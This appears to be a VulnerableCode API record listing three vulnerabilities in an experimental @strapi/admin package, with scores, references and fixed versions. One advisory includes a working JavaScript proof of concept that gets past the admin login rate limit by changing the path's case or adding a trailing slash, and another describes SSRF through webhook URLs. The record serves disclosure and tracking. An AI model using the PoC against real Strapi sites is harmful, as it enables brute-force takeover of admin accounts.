Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/675071?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/675071?format=api", "purl": "pkg:npm/%40strapi/admin@0.0.0-experimental.e30dccd40a6b6f762843005e6baefe4f2f82d919", "type": "npm", "namespace": "@strapi", "name": "admin", "version": "0.0.0-experimental.e30dccd40a6b6f762843005e6baefe4f2f82d919", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "4.25.2", "latest_non_vulnerable_version": "5.33.3", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46009?format=api", "vulnerability_id": "VCID-adab-ztym-ayhd", "summary": "Strapi may leak sensitive user information, user reset password, tokens via content-manager views\nAttackers can get access to user reset password tokens if they have the configure view permissions.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-36472", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00137", "scoring_system": "epss", "scoring_elements": "0.33352", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00137", "scoring_system": "epss", "scoring_elements": "0.33389", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00137", "scoring_system": "epss", "scoring_elements": "0.33373", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-36472" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v4.11.7", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-25T15:00:22Z/" } ], "url": "https://github.com/strapi/strapi/releases/tag/v4.11.7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36472", "reference_id": "CVE-2023-36472", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36472" }, { "reference_url": "https://github.com/advisories/GHSA-v8gg-4mq2-88q4", "reference_id": "GHSA-v8gg-4mq2-88q4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v8gg-4mq2-88q4" }, { "reference_url": "https://github.com/strapi/strapi/security/advisories/GHSA-v8gg-4mq2-88q4", "reference_id": "GHSA-v8gg-4mq2-88q4", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-25T15:00:22Z/" } ], "url": "https://github.com/strapi/strapi/security/advisories/GHSA-v8gg-4mq2-88q4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/66918?format=api", "purl": "pkg:npm/%40strapi/admin@4.11.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-byez-u4kv-7qac" }, { "vulnerability": "VCID-s8e6-3wdh-k3gz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540strapi/admin@4.11.7" } ], "aliases": [ "CVE-2023-36472", "GHSA-v8gg-4mq2-88q4" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-adab-ztym-ayhd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46012?format=api", "vulnerability_id": "VCID-byez-u4kv-7qac", "summary": "Strapi Improper Rate Limiting vulnerability\n### 1. Summary\nThere is a rate limit on the login function of Strapi's admin screen, but it is possible to circumvent it.\n\n### 2. Details\nIt is possible to avoid this by modifying the rate-limited request path as follows.\n1. Manipulating request paths to upper or lower case. (Pattern 1)\n - In this case, avoidance is possible with various patterns.\n2. Add path slashes to the end of the request path. (Pattern 2)\n\n### 3. PoC\nAccess the administrator's login screen (`/admin/auth/login`) and execute the following PoC on the browser's console screen.\n\n#### Pattern 1 (uppercase and lowercase)\n```js\n// poc.js\n(async () => {\n const data1 = {\n email: \"admin@strapi.com\", // registered e-mail address\n password: \"invalid_password\",\n };\n const data2 = {\n email: \"admin@strapi.com\",\n password: \"RyG5z-CE2-]*4e4\", // correct password\n };\n\n for (let i = 0; i < 30; i++) {\n await fetch(\"http://localhost:1337/admin/login\", {\n method: \"POST\",\n body: JSON.stringify(data1),\n headers: {\n \"Content-Type\": \"application/json\",\n },\n });\n }\n\n const res1 = await fetch(\"http://localhost:1337/admin/login\", {\n method: \"POST\",\n body: JSON.stringify(data2),\n headers: {\n \"Content-Type\": \"application/json\",\n },\n });\n console.log(res1.status + \" \" + res1.statusText);\n\n const res2 = await fetch(\"http://localhost:1337/admin/Login\", { // capitalize part of path\n method: \"POST\",\n body: JSON.stringify(data2),\n headers: {\n \"Content-Type\": \"application/json\",\n },\n });\n console.log(res2.status + \" \" + res2.statusText);\n})();\n```\n\n##### This PoC does the following:\n1. Request 30 incorrect logins.\n4. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (`429 Too Many Requests`)\n5. Next, falsify the pathname of the request (**`/admin/Login`**) and make a request again to confirm that it is possible to bypass the rate limit and log in. (`200 OK`)\n\n#### Pattern 2 (trailing slash)\n```js\n// poc.js\n(async () => {\n const data1 = {\n email: \"admin@strapi.com\", // registered e-mail address\n password: \"invalid_password\",\n };\n const data2 = {\n email: \"admin@strapi.com\",\n password: \"RyG5z-CE2-]*4e4\", // correct password\n };\n\n for (let i = 0; i < 30; i++) {\n await fetch(\"http://localhost:1337/admin/login\", {\n method: \"POST\",\n body: JSON.stringify(data1),\n headers: {\n \"Content-Type\": \"application/json\",\n },\n });\n }\n\n const res1 = await fetch(\"http://localhost:1337/admin/login\", {\n method: \"POST\",\n body: JSON.stringify(data2),\n headers: {\n \"Content-Type\": \"application/json\",\n },\n });\n console.log(res1.status + \" \" + res1.statusText);\n\n const res2 = await fetch(\"http://localhost:1337/admin/login/\", { // trailing slash\n method: \"POST\",\n body: JSON.stringify(data2),\n headers: {\n \"Content-Type\": \"application/json\",\n },\n });\n console.log(res2.status + \" \" + res2.statusText);\n})();\n```\n\n##### This PoC does the following:\n1. Request 30 incorrect logins.\n2. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (`429 Too Many Requests`)\n3. Next, falsify the pathname of the request (**`/admin/login/`**) and make a request again to confirm that it is possible to bypass the rate limit and log in. (`200 OK`)\n\n\n\n### 4. Impact\n It is possible to bypass the rate limit of the login function of the admin screen. \nTherefore, the possibility of unauthorized login by login brute force attack increases.\n\n### 5. Measures\nForcibly convert the request path used for rate limiting to upper case or lower case and judge it as the same path. (`ctx.request.path`) \nAlso, remove any extra slashes in the request path.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-38507", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00255", "scoring_system": "epss", "scoring_elements": "0.49123", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00255", "scoring_system": "epss", "scoring_elements": "0.4914", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00255", "scoring_system": "epss", "scoring_elements": "0.4913", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-38507" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-25T18:05:45Z/" } ], "url": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v4.12.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-25T18:05:45Z/" } ], "url": "https://github.com/strapi/strapi/releases/tag/v4.12.1" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38507", "reference_id": "CVE-2023-38507", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38507" }, { "reference_url": "https://github.com/advisories/GHSA-24q2-59hm-rh9r", "reference_id": "GHSA-24q2-59hm-rh9r", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-24q2-59hm-rh9r" }, { "reference_url": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r", "reference_id": "GHSA-24q2-59hm-rh9r", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-25T18:05:45Z/" } ], "url": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/66923?format=api", "purl": "pkg:npm/%40strapi/admin@4.12.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-s8e6-3wdh-k3gz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540strapi/admin@4.12.1" } ], "aliases": [ "CVE-2023-38507", "GHSA-24q2-59hm-rh9r" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-byez-u4kv-7qac" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57351?format=api", "vulnerability_id": "VCID-s8e6-3wdh-k3gz", "summary": "Strapi allows Server-Side Request Forgery in Webhook function\nIn Strapi latest version, at function Settings -> Webhooks, the application allows us to input a URL in order to create a Webook connection. However, we can input into this field the local domains such as `localhost`, `127.0.0.1`, `0.0.0.0`,.... in order to make the Application fetching into the internal itself, which causes the vulnerability `Server - Side Request Forgery (SSRF)`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-52588", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00321", "scoring_system": "epss", "scoring_elements": "0.55449", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00321", "scoring_system": "epss", "scoring_elements": "0.55443", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00321", "scoring_system": "epss", "scoring_elements": "0.55454", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-52588" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52588", "reference_id": "CVE-2024-52588", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52588" }, { "reference_url": "https://github.com/advisories/GHSA-v8wj-f5c7-pvxf", "reference_id": "GHSA-v8wj-f5c7-pvxf", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-v8wj-f5c7-pvxf" }, { "reference_url": "https://github.com/strapi/strapi/security/advisories/GHSA-v8wj-f5c7-pvxf", "reference_id": "GHSA-v8wj-f5c7-pvxf", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-05-29T13:44:22Z/" } ], "url": "https://github.com/strapi/strapi/security/advisories/GHSA-v8wj-f5c7-pvxf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/85232?format=api", "purl": "pkg:npm/%40strapi/admin@4.25.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540strapi/admin@4.25.2" } ], "aliases": [ "CVE-2024-52588", "GHSA-v8wj-f5c7-pvxf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-s8e6-3wdh-k3gz" } ], "fixing_vulnerabilities": [], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/%2540strapi/admin@0.0.0-experimental.e30dccd40a6b6f762843005e6baefe4f2f82d919" }